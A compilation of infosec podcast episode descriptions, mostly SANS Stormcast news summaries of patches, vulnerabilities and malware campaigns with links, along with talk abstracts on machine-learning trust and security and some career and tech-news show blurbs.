Podcasts about infosec

SmartApeSG campaign uses ClickFix page to push NetSupport RAT A detailed analysis of a recent SamtApeSG campaign taking advantage of ClickFix https://isc.sans.edu/diary/32474 Formbook Delivered Through Multiple Scripts An analysis of a recent version of Formbook showing how it takes advantage of multiple obfuscation tricks https://isc.sans.edu/diary/32480 sudo-rs vulnerabilities Two vulnerabilities were patched in sudo-rs, the version of sudo written in Rust, showing that while Rust does have an advantage when it comes to memory safety, there are plenty of other vulnerabilities to worry about https://ubuntu.com/security/notices/USN-7867-1 https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-c978-wq47-pvvw?ref=itsfoss.com SANS Holiday Hack Challenge https://sans.org/HolidayHack

OWASP Top 10 2025 Release Candidate OWASP published a release candidate for the 2025 version of its Top 10 list https://owasp.org/Top10/2025/0x00_2025-Introduction/ Citrix/Cisco Exploitation Details Amazon detailed how Citrix and Cisco vulnerabilities were used by advanced actors to upload webshells https://aws.amazon.com/blogs/security/amazon-discovers-apt-exploiting-cisco-and-citrix-zero-days/ Testing Quantum Readyness A website tests your services for post-quantum computing-resistant cryptographic algorithms https://qcready.com/

Neste episódio, recebemos o pesquisador C4ng4c3ir0, um verdadeiro veterano do mundo dos Bug Bounties e atualmente #.1 no Ranking Brasileiro. Ele abriu o jogo sobre como é a rotina de quem caça vulnerabilidades, os desafios de lidar com triagens demoradas e programas mal estruturados, e o que separa um bom caçador de um simples “report spammer”. Discutimos o equilíbrio entre reconhecimento, ética e técnica, e como as empresas podem aprender com quem vive na linha de frente da segurança.Become a supporter of this podcast: https://www.spreaker.com/podcast/devsecops-podcast--4179006/support.Apoio: Nova8, Snyk, Conviso, Gold Security, Digitalwolk e PurpleBird Security.

Microsoft Patch Tuesday for November 2025 https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+for+November+2025/32468/ Gladinet Triofox Vulnerability Triofox uses the host header in lieu of proper access control, allowing an attacker to access the page managing administrators by simply setting the host header to localhost. https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480/ SAP November 2025 Patch Day SAP fixed a critical vulnerability, fixed default credentials in its SQL Anywhere Monitor https://onapsis.com/blog/sap-security-patch-day-november-2025/ Ivanti Endpoint Manager Updates https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2025-for-EPM-2024?language=en_US

Reasoning—the process of drawing conclusions from prior knowledge—is a hallmark of intelligence. Large language models, and more recently, large reasoning models have demonstrated impressive results on many reasoning-intensive benchmarks. Careful studies over the past few years have revealed that LLMs may exhibit some reasoning behavior, and larger models tend to do better on reasoning tasks. However, even the largest current models still struggle on various kinds of reasoning problems. In this talk, we will try to address the question: Are the observed reasoning limitations of LLMs fundamental in nature? Or will they be resolved by further increasing the size and data of these models, or by better techniques for training them? I will describe recent work to tackle this question from several different angles. The answer to this question will help us to better understand the risks posed by future LLMs as vast resources continue to be invested in their development. About the speaker: Abulhair Saparov is an Assistant Professor of Computer Science at Purdue University. His research focuses on applications of statistical machine learning to natural language processing, natural language understanding, and reasoning. His recent work closely examines the reasoning capacity of large language models, identifying fundamental limitations, and developing new methods and tools to address or workaround those limitations. He has also explored the use of symbolic and neurosymbolic methods to both understand and improve the reasoning capabilities of AI models. He is also broadly interested in other applications of statistical machine learning, such as to the natural sciences.

It isn t always defaults: Scans for 3CX Usernames Our honeypots detected scans for usernames that may be related to 3CX business phone systems https://isc.sans.edu/diary/It%20isn%27t%20always%20defaults%3A%20Scans%20for%203CX%20usernames/32464 Watchguard Default Password Controversy A CVE number was assigned to a default password commonly used in Watchguard products. This was a documented username and password that was recently removed in a firmware upgrade. https://github.com/cyberbyte000/CVE-2025-59396/blob/main/CVE-2025-59396.txt https://nvd.nist.gov/vuln/detail/CVE-2025-59396 JavaScript expr-eval Vulnerability The JavaScript expr-eval library was vulnerable to a code execution issue. https://www.kb.cert.org/vuls/id/263614

Honeypot Requests for Code Repository Attackers continue to scan websites for source code repositories. Keep your repositories outside your document root and proactively scan your own sites. https://isc.sans.edu/diary/Honeypot%3A%20Requests%20for%20%28Code%29%20Repositories/32460 Malicious NuGet Packages Deliver Time-Delayed Destructive Payloads Newly discovered malicious .NET packages attempt to deliver a time-delayed attack targeting ICS systems. https://socket.dev/blog/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads Side Channel Leaks in Encrypted Traffic to LLMs Traffic to LLMs can be profiled to discover the nature of prompts sent by a user based on the amount and structure of the encrypted data. https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/

L'anniversario del worm di Morris. IA vietate nello sviluppo di Asahi Linux. Liber Liber, truffe online, e chargeback di Paypal. Waymo ha investito un gatto. La scuola senza smartphone. Queste e molte altre le notizie tech commentate nella puntata di questa settimana.Dallo studio distribuito di digitalia:Franco Solerio, Michele Di Maio, Francesco FacconiProduttori esecutivi:Arnoud Van Der Giessen, Matteo Cosentino, Fiorenzo Pilla, Alessio Pascucci, @Blis, Alessandro Lazzarini, Anonymous Podcast Guru User, Marco Goglio, Matteo De Lucia, Davide D'angelo, Roberto Barison, Danilo Sia, Arzigogolo, Massimiliano Casamento, Massimiliano Saggia, Matteo Masconale, Massimo Passerini, Francesco Paolo Sileno, Paolo Lucciola, Maurizio Verrone, Alessio Conforto, Paolo Bernardini, Stefano Orso, Pasquale Maffei, Matteo Arrighi, Davide Tinti, Consultech Srl, ma7u, Maurizio Galluzzo, Davide Capra, Michele Olivieri, Simone Pignatti, Giuliano Arcinotti, Massimo Dalla Motta, Ivan, Nicola Pedonese, Giulio Gabrieli, @Joanpiretz, Simone Andreozzi, Piero Alberto Mazzo, Manuel Zavatta, Matteo Carpentieri, Federico Bruno, @Michele_Da_Milano, Davide Dari, Andrea Sinigaglia, Edoardo Zini, Yoandi Herrera, Pierpaolo Taffarello, @Akagrinta, Christian Fabiani, Andrea Dell'agostino, @Jh4CkalSponsor:Links:Synthient Credential Stuffing Threat Data Breach37 years ago this week, the Morris wormGenerative AI Policy - Asahi Linux DocumentationApple Podcasts Embraces ChaptersIl caso paradossale di Liber Liber e PaypalChe cos'è la tariffa di chargeback?Apple will power Siri with Google's Gemini AIDeath of beloved neighborhood cat sparks outrage against robotaxisHackers are already using AI-enabled malware Google saysL'autobus Cinese nella miniera di calcareTesla Shareholders Approve Elon Musk's $1 Trillion Pay PackageElon Musk says Optimus will 'eliminate poverty'Karp: "a Surveillance State Is Preferable to China Winning"Meta projected 10% of 2024 revenue came from scamsAshamed if OpenAI isn't first company led by an AI CEOMeet Project Suncatcher, Google's plan to put AI data centers in spaceAnche la Lega Serie A chiederà un risarcimentosu(0)ny - HomeUS gives local police a face-scanning appNew York school phone ban has made lunch loud againLa scuola ai tempi del registro elettronicoGingilli del giorno:ARC Raiders - Extraction game based in NapoliThe Art of AtariPortale antenati - un archivio digitale di atti anagrafici storiciSupporta Digitalia, diventa produttore esecutivo.

Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell [Guest Diary] Windows, with PowerShell, has a great scripting platform to match common Linux/Unix command line utilities. https://isc.sans.edu/diary/Binary%20Breadcrumbs%3A%20Correlating%20Malware%20Samples%20with%20Honeypot%20Logs%20Using%20PowerShell%20%5BGuest%20Diary%5D/32454 RondoDox v2 Increases Exploits The RondoDox (or RondoWorm) added a substantial amount of new exploits to its repertoire. https://beelzebub.ai/blog/rondo-dox-v2/ Google Chrome Updates Google released an update for Google Chrome addressing five vulnerabilities. https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop.html Cisco Unified Contact Center Express Remote Code Execution Vulnerabilities Cisco patched two critical vulnerabilities in its Contact Center Express software. These vulnerabilities may lead to a full system compromise. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

Updates to Domainname API Some updates to our domainname API will make it more flexible and make it easier and faster to get the complete dataset. https://isc.sans.edu/diary/Updates%20to%20Domainname%20API/32452 Microsoft Teams Impersonation and Spoofing Vulnerabilities Checkpoint released details about recently patched spoofing and impersonation vulnerabilities in Microsoft Teams https://research.checkpoint.com/2025/microsoft-teams-impersonation-and-spoofing-vulnerabilities-exposed/ NViso Report: VSHELL NViso published an amazingly detailed report describing the remote control implant VSHELL. The report includes details about the inner workings of the tool as well as detection ideas. https://www.nviso.eu/blog/nviso-analyzes-vshell-post-exploitation-tool

O lançamento do Aardvark marcou mais um passo na integração entre Application Security e Inteligência Artificial. Mas o que isso realmente significa para o futuro da segurança de software? Neste episódio, exploramos como soluções baseadas em IA estão transformando a forma como detectamos, priorizamos e corrigimos vulnerabilidades — e o que muda no papel do profissional de AppSec diante dessa automação crescente. Conversamos sobre riscos, oportunidades e limites éticos dessa evolução: da triagem automatizada à geração de código seguro, passando por frameworks que prometem “segurança autônoma”. No fim, a pergunta permanece: estamos prontos para confiar à IA a defesa das nossas aplicações?Become a supporter of this podcast: https://www.spreaker.com/podcast/devsecops-podcast--4179006/support.Apoio: Nova8, Snyk, Conviso, Gold Security, Digitalwolk e PurpleBird Security.

Apple Patches Everything, Again Apple released a minor OS upgrade across its lineup, fixing a number of security vulnerabilities. https://isc.sans.edu/diary/Apple%20Patches%20Everything%2C%20Again/32448 Remote Access Tools Used to Compromise Trucking and Logistics Attackers infect trucking and logistics companies with regular remote management tools to inject malware into other companies or learn about high-value loads in order to steal them. https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics Google Android Patch Day Google released its usual monthly Android updates this week https://source.android.com/docs/security/bulletin/2025-11-01

Can we automatically and provably quantify and control the information leakage from a black-box processing? From a statistical inference standpoint, in this talk, I will start from a unified framework to summarize existing privacy definitions based on input-independent  indistinguishability and unravel the fundamental challenges in crafting privacy proof for general data processing. Yet, the landscape shifts when we gain access to the (still possibly black-box) secret generation. By carefully leveraging its entropy, we unlock  the black-box analysis. This breakthrough enables us to automatically "learn" the underlying inference hardness for an adversary to recover arbitrarily-selected sensitive features fully through end-to-end simulations without any algorithmic restrictions. Meanwhile,  a set of new information-theoretical tools will be introduced to efficiently minimize additional noise perturbation assisted with sharpened adversarially adaptive composition. I will also unveil the win-win situation between the privacy and stability for simultaneous  algorithm improvements. Concrete applications will be given in diverse domains, including privacy-preserving machine learning on image classification and large language models, side-channel leakage mitigation and formalizing long-standing heuristic data obfuscations. About the speaker: Hanshen Xiao is an Assistant Professor in the Department of Computer Science. He received his Ph.D. degree in computer science from MIT and B.S. degree in Mathematics from Tsinghua University. Before joining Purdue, he was a research scientist at NVIDIA Research. His research focuses on provable trustworthy machine learning and computation, with a particular focus on automated black-box privatization, differential trust with applications on backdoor defense and memorization mitigation, and trustworthiness evaluation.

XWiki SolrSearch Exploit Attempts CVE-2025-24893 We have detected a number of exploit attempts against XWiki taking advantage of a vulnerability that was added to the KEV list on Friday. https://isc.sans.edu/diary/XWiki%20SolrSearch%20Exploit%20Attempts%20%28CVE-2025-24893%29%20with%20link%20to%20Chicago%20Gangs%20Rappers/32444 AMD Zen 5 Random Number Generator Bug The RDSEED function for AMD s Zen 5 processors does return 0 more often than it should. https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7055.html SleepyDuck malware invades Cursor through Open VSX Yet another Open VSX extension stealing crypto credentials https://secureannex.com/blog/sleepyduck-malware/

Scans for WSUS: Port 8530/8531 TCP, CVE-2025-59287 We did observe an increase in scans for TCP ports 8530 and 8531. These ports are associated with WSUS and the scans are likely looking for servers vulnerable to CVE-2025-59287 https://isc.sans.edu/diary/Scans%20for%20Port%208530%208531%20%28TCP%29.%20Likely%20related%20to%20WSUS%20Vulnerability%20CVE-2025-59287/32440 BADCANDY Webshell Implant Deployed via The Australian Signals Directorate warns that they still see Cisco IOS XE devices not patches for CVE-2023-20198. A threat actor is now using this vulnerability to deploy the BADCANDY implant for persistent access https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/badcandy Improvements to Open VSX Security In reference to the Glassworm incident, OpenVSX published a blog post outlining some of the security improvements they will make to prevent a repeat of this incident. https://blogs.eclipse.org/post/mika l-barbero/open-vsx-security-update-october-2025

X-Request-Purpose: Identifying "research" and bug bounty related scans? Our honeypots captured a few requests with bug bounty specific headers. These headers are meant to make it easier to identify requests related to bug bounty, and they are supposed to identify the researcher conducting the scans https://isc.sans.edu/diary/X-Request-Purpose%3A%20Identifying%20%22research%22%20and%20bug%20bounty%20related%20scans%3F/32436 Proton Breach Observatory Proton opened up its breach observatory. This website will collect information about breaches affecting companies that have not yet made the breach public. https://proton.me/blog/introducing-breach-observatory Microsoft Exchange Server Security Best Practices A new document published by a collaboration of national cyber security agencies summarizes steps that should be taken to harden Exchange Server. https://www.nsa.gov/Portals/75/documents/resources/cybersecurity-professionals/CSI_Microsoft_Exchange_Server_Security_Best_Practices.pdf?ver=9mpKKyUrwfpb9b9r4drVMg%3d%3d MOVEit Vulnerability Progress published an advisory for its file transfer program MOVEIt . This software has had heavily exploited vulnerabilities in the past. https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025

How to Collect Memory-Only Filesystems on Linux Systems Getting forensically sound copies of memory-only file systems on Linux can be tricky, as tools like dd do not work. https://isc.sans.edu/diary/How%20to%20collect%20memory-only%20filesystems%20on%20Linux%20systems/32432 Microsoft Azure Front Door Outage Today, Microsoft s Azure Front Door service failed, leading to users not being able to authenticate to various Azure-related services. https://azure.status.microsoft/en-us/status Docker-Compose Vulnerability A vulnerability in docker-compose may be used to trick users into creating files outside the docker-compose directory https://github.com/docker/compose/security/advisories/GHSA-gv8h-7v7w-r22q

Phishing with Invisible Characters in the Subject Line Phishing emails use invisible UTF-8 encoded characters to break up keywords used to detect phishing (or spam). This is aided by mail clients not rendering some characters that should be rendered. https://isc.sans.edu/diary/A%20phishing%20with%20invisible%20characters%20in%20the%20subject%20line/32428 Apache Tomcat PUT Directory Traversal Apache released an update to Tomcat fixing a directory traversal vulnerability in how the PUT method is used. Exploits could upload arbitrary files, leading to remote code execution. https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog BIND9 DNS Spoofing Vulnerability A PoC exploit is now available for the recently patched BIND9 spoofing vulnerability https://gist.github.com/N3mes1s/f76b4a606308937b0806a5256bc1f918

Send us a textIn this candid and cathartic episode, Ken and Mike unpack the chaos that is Q4 for security professionals. From budget burnouts to end-of-year pentesting sprints, they explore why the final months of the year feel like a perfect storm for stress. Tune in as they share hard-earned lessons, practical advice for maintaining your sanity, and some gentle reminders that not everything needs to ship before Christmas. Whether you're a tired vendor, an overwhelmed engineer, or just trying to make it to PTO, this episode is for you.

This episode of the InfoSec Beat podcast focuses on careers in information security. Accenture CISO Kris Burkhardt talks with Renée Fletcher, a program manager in Accenture Information Security. Renée is at a turning point in her career, moving from Governance, Risk and Compliance to a new strategic programs role as the Cyberstrategy, Geopolitical and Regulatory lead. Having been on the frontlines of strengthening Accenture's regulatory readiness, she reflects on starting from what you know to assess risk, building cross-functional teams, and communicating effectively. Learn why her career is a lesson in what can happen when the detour becomes the destination—and how her degree in forensic science still helps her today. Renée's career advice? You're more capable than you think.

The current largest challenge in ML-based malware detection is maintaining high detection rates while samples evolve, causing classifiers to drift. What is the best way to solve this problem? In this talk, Dr. Botacin presents two views on the problem: the scientific and the engineering. In the first part of the talk, Dr. Botacin discusses how to make ML-based drift detectors explainable. The talk discusses how one can split the classifier knowledge into two: (1) the knowledge about the frontier between Malware (M) and Goodware (G); and (2) the knowledge about the concept of the (M and G) classes, to understand whether the concept or the classification frontier changed. The second part of the talk discusses how the experimental conditions in which the drift handling approaches are developed often mismatch the real deployment settings, causing the solutions to fail to achieve the desired results. Dr Botacin points out ideal assumptions that do not hold in reality, such as: (1) the amount of drifted data a system can handle, and (2) the immediate availability of oracle data for drift detection, when in practice, a scenario of label delays is much more frequent. The talk demonstrates a solution for these problems via a 5K+ experiment, which illustrates (1) how to explain every drift point in a malware detection pipeline and (2) how an explainable drift detector also makes online retraining to achieve higher detection rates and requires fewer retraining points than traditional approaches. About the speaker: Dr. Botacin is a Computer Science Assistant Professor at Texas A&M University (TAMU, USA) since 2022. Ph.D. in Computer Science (UFPR, Brazil), Master's in Computer Science and Computer Engineering (UNICAMP, Brazil). Malware Analyst since 2012. Specialist in AV engines and Sandbox Development. Dr. Botacin published research papers at major academic conferences and journals. Dr. Botacin also presented his work at major industry and hacking conferences, such as HackInTheBox and Hou.Sec.Con.Page: https://marcusbotacin.github.io/

Bytes over DNS Didiear investigated which bytes may be transmitted as part of a hostname in DNS packets, depending on the client resolver and recursive resolver constraints https://isc.sans.edu/diary/Bytes%20over%20DNS/32420 Unifi Access Vulnerability Unifi fixed a critical vulnerability in it s Access product https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191 OpenAI Atlas Omnibox Prompt Injection OpenAI s latest browser can be jailbroken by inserting prompts in URLs https://neuraltrust.ai/blog/openai-atlas-omnibox-prompt-injection

Bilingual Phishing for Cloud Credentials Guy observed identical phishing messages in French and English attempting to phish cloud credentials https://isc.sans.edu/diary/Phishing%20Cloud%20Account%20for%20Information/32416 Kaitai Struct WebIDE The binary file analysis tool Kaitai Struct is now available in a web only version https://isc.sans.edu/diary/Kaitai%20Struct%20WebIDE/32422 WSUS Emergency Update Microsoft released an emergency patch for WSUS to fix a currently exploited critical vulnerability https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287 Network Security Devices Endanger Orgs with 90s-era Flaws Attackers increasingly use simple-to-exploit network security device vulnerabilities to compromise organizations. https://www.csoonline.com/article/4074945/network-security-devices-endanger-orgs-with-90s-era-flaws.html

Infostealer Targeting Android Devices This infostealer, written in Python, specifically targets Android phones. It takes advantage of Termux to gain access to data and exfiltrates it via Telegram. https://isc.sans.edu/diary/Infostealer%20Targeting%20Android%20Devices/32414 Attackers exploit recently patched Adobe Commerce Vulnerability CVE-2025-54236 Six weeks after Adobe's emergency patch, SessionReaper (CVE-2025-54236) has entered active exploitation. E-Commerce security company SanSec has detected multiple exploit attempts. https://sansec.io/research/sessionreaper-exploitation Patch for BIND and unbound nameservers CVE-2025-40780 The Internet Systems Consortium (ISC.org), as well as the Unbound project, patched a flaw that may allow for DNS spoofing due to a weak random number generator. https://kb.isc.org/docs/cve-2025-40780 WSUS Exploit Released CVE-2025-59287 Hawktrace released a walk through showing how to exploit the recently patched WSUS vulnerability https://hawktrace.com/blog/CVE-2025-59287

Register for FREE Infosec Webcasts, Anti-casts & Summits – https://poweredbybhis.com00:00:00 - PreShow Banter™ — AWS Snow Day Party00:11:31 - Online Book Store Takes Down Half of the Internet - BHIS - Talkin' Bout [infosec] News 2025-10-2000:12:12 - Story # 1: F5 says hackers stole undisclosed BIG-IP flaws, source code00:35:11 - Story # 2: Newsom signs age verification law, siding with tech giants over Hollywood00:48:39 - Story # 3: Researchers find a startlingly cheap way to steal your secrets from space00:55:04 - Story # 4: Jeff Bezos Has a Plan to Curb AI's Carbon Footprint: Send Data Centers to Space01:02:22 - Story # 5: SolarWinds Security Chief reflects on the Russian hack that exposed US government agencies

In this episode of the Unsecurity Podcast, hosted by Megan Larkins and Brad Nigh from FRSecure, we are joined by Pinky from the IR team to dive deep into the pressing cybersecurity challenges as the holiday season approaches.From early breaches to the increasing sophistication of AI in phishing attacks, discover how attackers are evolving their tactics. The trio discusses the impact of VPN vulnerabilities, the rise of AI-enabled chatbots in ransomware scenarios, and how businesses can prepare for the uptick in threats during this busy time of year.Whether you're an IT professional or just curious about cybersecurity, this episode is packed with valuable insights.Don't miss out!-- Like, subscribe, and share with your network to stay informed about the latest in cybersecurity!Looking to get in touch? Reach out at unsecurity@frsecure.com and follow us for more!LinkedIn: https://www.linkedin.com/company/frsecure/Instagram: https://www.instagram.com/frsecureofficial/Facebook: https://www.facebook.com/frsecure/BlueSky: https://bsky.app/profile/frsecure.bsky.socialAbout FRSecure:https://frsecure.com/FRSecure is a mission-driven information security consultancy headquartered in Minneapolis, MN. Our team of experts is constantly developing solutions and training to assist clients in improving the measurable fundamentals of their information security programs. These fundamentals are lacking in our industry, and while progress is being made, we can't do it alone. Whether you're wondering where to start or looking for a team of experts to collaborate with you, we are ready to serve.

webctrl.cgi/Blue Angel Software Suite Exploit Attempts. Maybe CVE-2025-34033 Variant? Our honeypots detected attacks that appear to exploit CVE-2025-34033 or a similar vulnerability in the Blue Angle Software Suite. https://isc.sans.edu/diary/webctrlcgiBlue+Angel+Software+Suite+Exploit+Attempts+Maybe+CVE202534033+Variant/32410 Oracle Critical Patch Update Oracle released its quarterly critical patch update. The update includes patches for 374 vulnerabilities across all of Oracle s products. There are nine more patches for Oracle s e-Business Suite. https://www.oracle.com/security-alerts/cpuoct2025.html#AppendixEBS Rust TAR Library Vulnerability A vulnerability in the popular, but no longer maintained, async-tar vulnerability could lead to arbitrary code execution https://edera.dev/stories/tarmageddon

What time is it? Accuracy of pool.ntp.org. How accurate and reliable is pool.ntp.org? Turns out it is very good! https://isc.sans.edu/diary/What%20time%20is%20it%3F%20Accuracy%20of%20pool.ntp.org./32390 Xubuntu Compromise The Xubuntu website was compromised last weekend and served malware https://floss.social/@bluesabre/115401767635718361 Squid Proxy Vulnerability The Squid team fixed an information disclosure vulnerabilty that may leak authentication credentials. https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr Lanscope Endpoint Manager Vulnerablity https://jvn.jp/en/jp/JVN86318557/index.html

Trust in modern AI systems hinges on understanding how they learn—and, increasingly, how they can forget. This talk develops a geometric view of trustworthiness that unifies structure-aware optimization, stability analysis, and the emerging science of unlearning. I will begin by revisiting the role of sharpness and flatness in shaping both generalization and sample sensitivity, showing how the geometry of the loss landscape governs what models remember. Building on these insights, I will present recent results on Sharpness-Aware Machine Unlearning, a framework that characterizes when and how learning algorithms can provably erase the influence of specific data points while preserving accuracy on the rest. The discussion connects theoretical guarantees with empirical findings on the role of data distribution and loss geometry in machine unlearning—ultimately suggesting that the shape of the optimization landscape is the shape of trust itself. About the speaker: Rajiv Khanna is an Assistant Professor in the Department of Computer Science. His research interests span various subfields of machine learning including optimization, theory and interpretability.Previously, he held positions of Visiting Faculty Researcher at Google, postdoctoral scholar at Foundations of Data Analystics Institute at University of California, Berkeley and a Research Fellow in the Foundations of Data Science program at the Simons Institute also at UC Berkeley. He graduated with his PhD from UT Austin.

____________Podcast Redefining Society and Technology Podcast With Marco Ciappellihttps://redefiningsocietyandtechnologypodcast.com  ____________Host Marco CiappelliCo-Founder & CMO @ITSPmagazine | Master Degree in Political Science - Sociology of Communication l Branding & Marketing Advisor | Journalist | Writer | Podcast Host | #Technology #Cybersecurity #Society

Using Syscall() for Obfuscation/Fileless Activity Fileless malware written in Python can uses syscall() to create file descriptors in memory, evading signatures. https://isc.sans.edu/diary/Using%20Syscall%28%29%20for%20Obfuscation%20Fileless%20Activity/32384 AWS Outages AWS has had issues most of the day on Monday, affecting numerous services. https://health.aws.amazon.com/health/status Time Server Hack China reports a compromise of its time standard servers. https://thehackernews.com/2025/10/mss-claims-nsa-used-42-cyber-tools-in.html

TikTok Videos Promoting Malware InstallationTikTok Videos Promoting Malware Installation Tiktok videos advertising ways to obtain software like Photoshop for free will instead trick users into downloading https://isc.sans.edu/diary/TikTok%20Videos%20Promoting%20Malware%20Installation/32380 Google Ads Advertise Malware Targeting MacOS Developers Hunt.io discovered Google ads that pretend to advertise tools like Homebrew and password managers to spread malware https://hunt.io/blog/macos-odyssey-amos-malware-campaign Satellite Transmissions are often unencrypted A large amount of satellite traffic is unencrypted and easily accessible to eavesdropping https://satcom.sysnet.ucsd.edu

New DShield Support Slack Workspace Due to an error on Salesforce s side, we had to create a new Slack Workspace for DShield support. https://isc.sans.edu/diary/New%20DShield%20Support%20Slack/32376 Attackers Exploiting Recently Patched Cisco SNMP Flaw (CVE-2025-20352) Trend Micro published details explaining how attackers took advantage of a recently patched Cisco SNMP Vulnerability https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte Framework BIOS Backdoor The mm command impleneted in Framework BIOS shells can be used to compromise a device pre-boot. https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/ SANS.edu Research: Mark Stephens, Validating the Effectiveness of MITRE Engage and Active Defense https://www.sans.edu/cyber-research/validating-effectiveness-mitre-engage-active-defense/

Clipboard Image Stealer Xavier presents an infostealer in Python that steals images from the clipboard. https://isc.sans.edu/diary/Clipboard%20Pictures%20Exfiltration%20in%20Python%20Infostealer/32372 F5 Compromise F5 announced a wide-ranging compromise today. Source code and information about unpatched vulnerabilities were stolen. https://my.f5.com/manage/s/article/K000157005 https://my.f5.com/manage/s/article/K000156572 https://my.f5.com/manage/s/article/K000154696 Adobe Updates Adobe updated 12 different products yesterday. https://helpx.adobe.com/security.html SAP Patchday Among the critical vulnerabilities patched in SAP s products are two deserialization vulnerabilities with a CVSS score of 10.0 https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html https://onapsis.com/blog/sap-security-patch-day-october-2025/

Microsoft Patch Tuesday Microsoft not only released new patches, but also the last patches for Windows 10, Office 2016, Office 2019, Exchange 2016 and Exchange 2019. https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20October%202025/32368 Ivanti Advisory Ivanti released an advisory with some mitigation steps users can take until the recently made public vulnerablities are patched. https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-October-2025?language=en_US Fortinet Patches https://fortiguard.fortinet.com/psirt/FG-IR-25-010 https://fortiguard.fortinet.com/psirt/FG-IR-24-361

Scans for ESAFENET CDG V5 We do see some increase in scans for the Chinese secure document management system, ESAFENET. https://isc.sans.edu/diary/Heads%20Up%3A%20Scans%20for%20ESAFENET%20CDG%20V5%20/32364 Investigating targeted payroll pirate attacks affecting US universities Microsoft wrote about how payroll pirates redirect employee paychecks via phishing. https://www.microsoft.com/en-us/security/blog/2025/10/09/investigating-targeted-payroll-pirate-attacks-affecting-us-universities/ Attacks against Edge via IE Mode Microsoft Edge offers an IE legacy mode to support websites created for Internet Explorer. The old JavaScript engine, which is part of this mode, has been abused in recent attacks, and Microsoft will make it more difficult to enable IE Mode to counter these attacks. https://microsoftedge.github.io/edgevr/posts/Changes-to-Internet-Explorer-Mode-in-Microsoft-Edge/

New Oracle E-Business Suite Patches Oracle released one more patch for the e-business suite. Oracle does not state if it is already exploited, but the timing of the patch suggests that it should be expedited. https://www.oracle.com/security-alerts/alert-cve-2025-61884.html Widespread Sonicwall SSLVPN Compromise Huntress Labs observed the widespread compromise of the Sonicwall SSLVPN appliance. https://www.huntress.com/blog/sonicwall-sslvpn-compromise Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw (CVE-2025-11371) An unpatched vulnerability in the secure file sharing solutions Gladinet CentreStack and TrioFox is being exploited. https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw Two 7-Zip Vulnerabilities CVE-2025-11002, CVE-2025-11001 7-Zip patched two vulnerabilities that may lead to arbitrary code execution https://www.zerodayinitiative.com/advisories/ZDI-25-949/ https://www.zerodayinitiative.com/advisories/ZDI-25-950/

Building Better Defenses: RedTail Observations Defending against attacks like RedTail is more then blocking IoCs, but instead one must focus on the techniques and tactics attackers use. https://isc.sans.edu/diary/Guest+Diary+Building+Better+Defenses+RedTail+Observations+from+a+Honeypot/32312 Sonicwall: It wasn t the user s fault Sonicwall admits to a breach resulting in the loss of user configurations stored in its cloud service https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330 Crowdstrike has Issues Crowdstrike fixes two vulnerabilities in the Windows version of its Falcon sensor. https://www.crowdstrike.com/en-us/security-advisories/issues-affecting-crowdstrike-falcon-sensor-for-windows/ Interrogators: Attack Surface Mapping in an Agentic World A SANS.edu master s degree student research paper by Michael Samson https://isc.sans.edu/researchpapers/pdfs/michael_samson.pdf keywords: ai; agentic; attack surface; crowdstrike; sonicwall; ivanti; zero day; initiative; redline

Polymorphic Python Malware Xavier discovered self-modifying Python code on Virustotal. The remote access tool takes advantage of the inspect module to modify code on the fly. https://isc.sans.edu/diary/Polymorphic%20Python%20Malware/32354 SSH ProxyCommand Vulnerability A user cloning a git repository may be tricked into executing arbitrary code via the SSH proxycommand option. https://dgl.cx/2025/10/bash-a-newline-ssh-proxycommand-cve-2025-61984 Framelink Figma MCP Server CVE-2025-53967 Framelink Figma s MCP server suffers from a remote code execution vulnerability.

FreePBX Exploit Attempts (CVE-2025-57819) A FreePBX SQL injection vulnerability disclosed in August is being used to execute code on affected systems. https://isc.sans.edu/diary/Exploit%20Against%20FreePBX%20%28CVE-2025-57819%29%20with%20code%20execution./32350 Disrupting Threats Targeting Microsoft Teams Microsoft published a blog post outlining how to better secure Teams. https://www.microsoft.com/en-us/security/blog/2025/10/07/disrupting-threats-targeting-microsoft-teams/ Kibana XSS Patch CVE-2025-25009 Elastic patched a stored XSS vulnerability in Kibana https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-and-9-1-5-security-update-esa-2025-20/382449 QT SVG Vulnerabilities CVE-2025-10728, CVE-2025-10729, The QT group fixed two vulnerabilities in the QT SVG module. One of the vulnerabilities may be used for code execution https://www.qt.io/blog/security-advisory-uncontrolled-recursion-and-use-after-free-vulnerabilities-in-qt-svg-module-impact-qt

